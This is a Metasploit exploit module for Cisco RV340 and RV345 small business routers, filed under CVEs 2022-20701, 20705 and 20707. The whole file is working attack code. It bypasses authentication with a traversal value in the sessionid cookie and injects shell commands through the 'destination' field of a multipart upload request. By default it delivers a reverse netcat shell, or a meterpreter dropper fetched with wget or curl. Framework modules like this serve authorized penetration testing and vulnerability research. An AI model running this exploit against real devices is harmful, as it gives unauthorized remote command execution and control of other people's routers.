metasploit-gs/modules/exploits/linux/http/cisco_rv340_lan.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Cisco RV34X Series Authentication Bypass and Command Injection',
        'Description' => %q{
          This module exploits a sessionid directory traversal authentication bypass, a sessionid
          improper input validation authentication bypass, and command injection on Cisco RV340 and
          RV345 Small Business Routers. All vulnerabilities were discovered by Bien Pham
          at Sea Security.

          This module works on firmware versions 1.0.03.24 and below
        },
        'License' => MSF_LICENSE,
        'Platform' => ['Linux', 'Unix'],
        'Author' => [
          'Biem Pham',  # Vulnerability Discoveries
          'Neterum',    # Metasploit Module
          'jbaines-r7'  # This metasploit module is heavily inspired from
                        # cisco_rv_series_authbypass_and_rce.rb
        ],
        'DisclosureDate' => '2021-11-02',
        'Arch' => [ARCH_CMD, ARCH_ARMLE],
        'References' => [
          [ 'URL', 'https://blog.security.sea.com/posts/pwn2own-2021-rv340/'], # Possibly down
          [ 'CVE', '2022-20701'],
          [ 'CVE', '2022-20705'],
          [ 'CVE', '2022-20707']
        ],
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'Payload' => {
              },
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_netcat'
              }
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_ARMLE],
              'Type' => :linux_dropper,
              'Payload' => {
                'BadChars' => '\''
              },
              'CmdStagerFlavor' => [ 'wget', 'curl' ],
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp'
              }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'RPORT' => 443,
          'SSL' => true,
          'MeterpreterTryToFork' => true
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )
    register_options(
      [
        OptString.new('TARGETURI', [true, 'Base path', '/'])
      ]
    )
  end

  def check
    # Ripped from jbaines-r7 cisco_rv_series_authbypass_and_rce
    # Test to see if router is responding and possibly vulnerable
    res = send_exploit('id')
    return CheckCode::Unknown("Didn't receive a response from the target.") unless res
    return CheckCode::Safe('The target did not respond with a 200 OK.') unless res.code == 200

    if res.body.include?('"jsonrpc":"2.0"') || res.body.include?('<head><title>301 Moved Permanently</title></head>')
      return CheckCode::Appears('The device responded to exploitation with a 200 OK.')
    end

    CheckCode::Safe('The target did not respond with an expected payload.')
  end

  def execute_command(cmd, _opts = {})
    res = send_exploit(cmd)

    if target['Type'] != :unix_cmd
      fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200
      body_json = res.get_json_document
      fail_with(Failure::UnexpectedReply, 'The target did not respond with a JSON body') unless body_json
    end

    print_good('Exploit successfully executed.')
  end

  def send_exploit(cmd)
    send_request_cgi( {
                        'encode_params' => false,
                        'method' => 'POST',
                        'uri' => '/jsonrpc',
                        'data' => '{"jsonrpc": "2.0", "method": "login", "params": {"user": "bienpnn", "pass": "bienpnn"}}'
                        })

    filepath = '/tmp/upload.input'
    filename = 'bienpnn'
    pathparam = 'Configuration'
    fileparam = 'bienpnn'

    destination = '\'; ' + cmd + " #"
    input = 'bienpnn'

    multipart_form = Rex::MIME::Message.new
    multipart_form.add_part(filepath, nil, nil, 'form-data; name="file.path"')
    multipart_form.add_part(filename, nil, nil, 'form-data; name="filename"')
    multipart_form.add_part(pathparam, nil, nil, 'form-data; name="pathparam"')
    multipart_form.add_part(fileparam, nil, nil, 'form-data; name="fileparam"')
    multipart_form.add_part(destination, nil, nil, 'form-data; name="destination"')
    multipart_form.add_part(input, 'application/octet-stream', nil, 'form-data; name="input"; filename="bienpnn"')

    send_request_cgi({
                       'method' => 'POST',
                       'uri' => '/upload',
                       'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",
                       'headers' => {
                         'Cookie' => 'sessionid =../../../etc/passwd; sessionid=aaaaaaaaaaaaaaaa'
                       },
                       'data' => multipart_form.to_s
                     }, 10)
  end

  def exploit
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
    case target['Type']
    when :unix_cmd
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager(linemax: 120)
    end
  end
end